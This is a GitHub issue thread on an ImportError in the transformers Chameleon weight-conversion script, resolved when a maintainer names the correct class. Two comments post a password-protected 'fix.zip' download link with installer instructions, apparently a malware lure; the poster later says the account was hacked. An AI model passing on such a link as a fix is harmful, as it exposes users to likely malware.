### ISSUE TITLE
Covert chemaleon weights to hf, ImportError

### ISSUE THREAD

**Issue by ChinChyi** [huggingface/transformers#33116]
### System Info

```shell
ImportError: cannot import name 'ChameleonForCausalLM' from 'transformers'  (/mnt/petrelfs/xxxx/miniconda3/envs/lumina_mgpt/lib/python3.10/site-packages/transformers/__init__.py)
```

### Information

- [X] The official example scripts
- [ ] My own modified scripts

### Tasks

- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)
- [X] My own task or dataset (give details below)

### Reproduction

`python src/transformers/models/chameleon/convert_chameleon_weights_to_hf.py --input_dir /mnt/petrelfs/q-pth --model_size 7B --output_dir /mnt/petrelfs`

### Expected behavior

```shell
Hope this is fixed
```

### Checklist

- [X] I have read the migration guide in the readme. ([pytorch-transformers](https://github.com/huggingface/transformers#migrating-from-pytorch-transformers-to-transformers); [pytorch-pretrained-bert](https://github.com/huggingface/transformers#migrating-from-pytorch-pretrained-bert-to-transformers))
- [X] I checked if a related official extension example runs on my machine.

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChinChyi** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

whta?

**Comment by MoonShadowIllusion** [comment]
> > Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."
> 
> what?

my account seem to have been hacked, dont belive

**Comment by ArthurZucker** [comment]
Hey @ChinChyi, you should make sure that transformers is installed using `pip install -e .`

**Comment by ChinChyi** [comment]
> Hey @ChinChyi, you should make sure that transformers is installed using `pip install -e .`

@ArthurZucker I've installed transformers with this and I'm still getting this error

**Comment by ArthurZucker** [comment]
Ah you are completely right! The class is `ChameleonForConditionalGeneration` ! Would you like to open a PR to fix the class in the conversion script? 🤗
